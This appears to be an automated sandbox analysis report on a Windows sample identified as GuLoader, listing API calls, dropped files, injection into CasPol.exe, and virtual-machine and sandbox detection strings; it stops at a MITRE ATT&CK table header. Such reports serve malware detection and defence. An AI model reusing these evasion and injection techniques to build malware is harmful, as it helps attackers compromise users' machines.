          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_004031E9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,LdrInitializeThunk,DeleteFileA,CopyFileA,LdrInitializeThunk,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_004031E9
          Source: C:\Users\user\Desktop\download.exeFile created: C:\Windows\resources\0409Jump to behavior
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_00404A212_2_00404A21
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_706B1A982_2_706B1A98
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A314A82_2_04A314A8
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A320AE2_2_04A320AE
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A328972_2_04A32897
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3189B2_2_04A3189B
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A310F62_2_04A310F6
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A324DB2_2_04A324DB
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32C372_2_04A32C37
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3143B2_2_04A3143B
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A318002_2_04A31800
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A320182_2_04A32018
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31C752_2_04A31C75
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A324412_2_04A32441
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32DA22_2_04A32DA2
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31D822_2_04A31D82
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3198B2_2_04A3198B
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3318B2_2_04A3318B
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3218A2_2_04A3218A
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A321E82_2_04A321E8
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A319F62_2_04A319F6
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A315D02_2_04A315D0
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32D302_2_04A32D30
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3153A2_2_04A3153A
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A329092_2_04A32909
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31D0C2_2_04A31D0C
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3191C2_2_04A3191C
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3211C2_2_04A3211C
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3296F2_2_04A3296F
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3116E2_2_04A3116E
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A325522_2_04A32552
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31AA92_2_04A31AA9
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A316B32_2_04A316B3
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A30E922_2_04A30E92
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32E972_2_04A32E97
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3269B2_2_04A3269B
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A30E9A2_2_04A30E9A
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A326FB2_2_04A326FB
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A312DA2_2_04A312DA
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32A202_2_04A32A20
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3162C2_2_04A3162C
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3123F2_2_04A3123F
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32A082_2_04A32A08
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32E1D2_2_04A32E1D
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3261D2_2_04A3261D
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A322602_2_04A32260
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31E6F2_2_04A31E6F
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A30E442_2_04A30E44
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31A4D2_2_04A31A4D
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A323B22_2_04A323B2
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3178C2_2_04A3178C
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32B942_2_04A32B94
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31BE12_2_04A31BE1
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32FDA2_2_04A32FDA
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A313362_2_04A31336
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32F3F2_2_04A32F3F
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3233C2_2_04A3233C
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32B012_2_04A32B01
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31B0F2_2_04A31B0F
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A317182_2_04A31718
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31B712_2_04A31B71
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31F752_2_04A31F75
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631C754_2_00631C75
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006324414_2_00632441
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632C374_2_00632C37
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063143B4_2_0063143B
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006318004_2_00631800
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006320184_2_00632018
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006310F64_2_006310F6
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006324DB4_2_006324DB
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006314A84_2_006314A8
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006320AE4_2_006320AE
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006328974_2_00632897
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063189B4_2_0063189B
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063296F4_2_0063296F
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063116E4_2_0063116E
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006325524_2_00632552
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632D304_2_00632D30
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063153A4_2_0063153A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006329094_2_00632909
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631D0C4_2_00631D0C
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063191C4_2_0063191C
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063211C4_2_0063211C
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006321E84_2_006321E8
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006319F64_2_006319F6
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006315D04_2_006315D0
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632DA24_2_00632DA2
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631D824_2_00631D82
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063198B4_2_0063198B
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063318B4_2_0063318B
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063218A4_2_0063218A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006322604_2_00632260
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631E6F4_2_00631E6F
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00630E444_2_00630E44
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631A4D4_2_00631A4D
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632A204_2_00632A20
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063162C4_2_0063162C
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063123F4_2_0063123F
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632A084_2_00632A08
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632E1D4_2_00632E1D
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063261D4_2_0063261D
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006326FB4_2_006326FB
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006312DA4_2_006312DA
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631AA94_2_00631AA9
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006316B34_2_006316B3
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00630E924_2_00630E92
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632E974_2_00632E97
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063269B4_2_0063269B
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00630E9A4_2_00630E9A
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631B714_2_00631B71
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631F754_2_00631F75
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006313364_2_00631336
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632F3F4_2_00632F3F
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_0063233C4_2_0063233C
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632B014_2_00632B01
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631B0F4_2_00631B0F
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_006317184_2_00631718
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00631BE14_2_00631BE1
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 4_2_00632FDA4_2_00632FDA
          Source: lang-1032.dll.2.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
          Source: lang-1032.dll.2.drStatic PE information: No import functions for PE file found
          Source: C:\Users\user\Desktop\download.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: edgegdi.dllJump to behavior
          Source: download.exeStatic PE information: invalid certificate
          Source: C:\Users\user\Desktop\download.exeFile read: C:\Users\user\Desktop\download.exeJump to behavior
          Source: download.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\download.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\download.exe C:\Users\user\Desktop\download.exe
          Source: C:\Users\user\Desktop\download.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Users\user\Desktop\download.exe
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\download.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Users\user\Desktop\download.exeJump to behavior
          Source: C:\Users\user\Desktop\download.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_004031E9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,LdrInitializeThunk,DeleteFileA,CopyFileA,LdrInitializeThunk,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_004031E9
          Source: C:\Users\user\Desktop\download.exeFile created: C:\Users\user\AppData\Local\Temp\nsp21EF.tmpJump to behavior
          Source: classification engineClassification label: mal76.troj.evad.winEXE@4/5@0/1
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_004020D1 CoCreateInstance,MultiByteToWideChar,2_2_004020D1
          Source: C:\Users\user\Desktop\download.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_004044AE GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,2_2_004044AE
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4728:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4728:304:WilStaging_02
          Source: download.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          Yara detected GuLoader
          Source: Yara matchFile source: 00000004.00000002.5807012371.00000000025EF000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1806817167.00000000069EF000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1798739196.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: download.exe PID: 8540, type: MEMORYSTR
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_706B2F20 push eax; ret 2_2_706B2F4E
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A314A8 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A320AE push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A388BE push esp; ret 2_2_04A388DD
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32897 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3189B push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A30C99 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3449E push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3349D push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A340E2 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A340E6 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A394EB push esp; ret 2_2_04A394F1
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A310F6 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A30CFC push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A33CCE push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A324DB push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A364DC pushfd ; ret 2_2_04A364DD
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32C37 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3143B push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A33C02 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31800 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3440B push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3341B push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32018 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A3641D push 7E114A25h; iretd 2_2_04A3642D
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A34076 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A31C75 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A33878 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A32441 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A36C50 pushfd ; ret 2_2_04A36C51
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_04A335A3 push es; retf 2_2_04A34799
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_706B1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,2_2_706B1A98
          Source: C:\Users\user\Desktop\download.exeFile created: C:\Users\user\AppData\Local\Temp\nse224D.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\download.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize\lang-1032.dllJump to dropped file
          Source: C:\Users\user\Desktop\download.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\download.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\download.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Tries to detect Any.run
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: download.exe, 00000002.00000002.1798739196.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE3
          Source: download.exe, 00000002.00000002.1798739196.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXELE
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 928Thread sleep time: -300000s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\download.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Heize\lang-1032.dllJump to dropped file
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_00405745 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,2_2_00405745
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_004026FE FindFirstFileA,2_2_004026FE
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_00406280 FindFirstFileA,FindClose,2_2_00406280
          Source: C:\Users\user\Desktop\download.exeAPI call chain: ExitProcess graph end nodegraph_2-13223
          Source: C:\Users\user\Desktop\download.exeAPI call chain: ExitProcess graph end nodegraph_2-13228
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Users\user\Desktop\download.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
          Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicshutdown
          Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
          Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
          Source: CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicvss
          Source: CasPol.exe, 00000004.00000002.5897618619.0000000003EAB000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5897618619.0000000003F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: download.exe, 00000002.00000002.1798739196.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe3
          Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
          Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
          Source: download.exe, 00000002.00000002.1868881002.0000000008269000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
          Source: download.exe, 00000002.00000002.1798739196.0000000000AB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exele
          Source: CasPol.exe, 00000004.00000002.5899346239.0000000005B89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_706B1A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,2_2_706B1A98
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_00403B48 SetWindowPos,ShowWindow,DestroyWindow,SetWindowLongA,GetDlgItem,SendMessageA,IsWindowEnabled,SendMessageA,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,SetClassLongA,SendMessageA,GetDlgItem,ShowWindow,KiUserCallbackDispatcher,EnableWindow,GetSystemMenu,EnableMenuItem,SendMessageA,SendMessageA,SendMessageA,lstrlenA,SetWindowTextA,DestroyWindow,CreateDialogParamA,GetDlgItem,GetWindowRect,ScreenToClient,SetWindowPos,ShowWindow,DestroyWindow,EndDialog,ShowWindow,2_2_00403B48

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\download.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe base: 630000Jump to behavior
          Source: C:\Users\user\Desktop\download.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Users\user\Desktop\download.exeJump to behavior
          Source: C:\Users\user\Desktop\download.exeCode function: 2_2_004031E9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,LdrInitializeThunk,DeleteFileA,CopyFileA,LdrInitializeThunk,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,2_2_004031E9

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
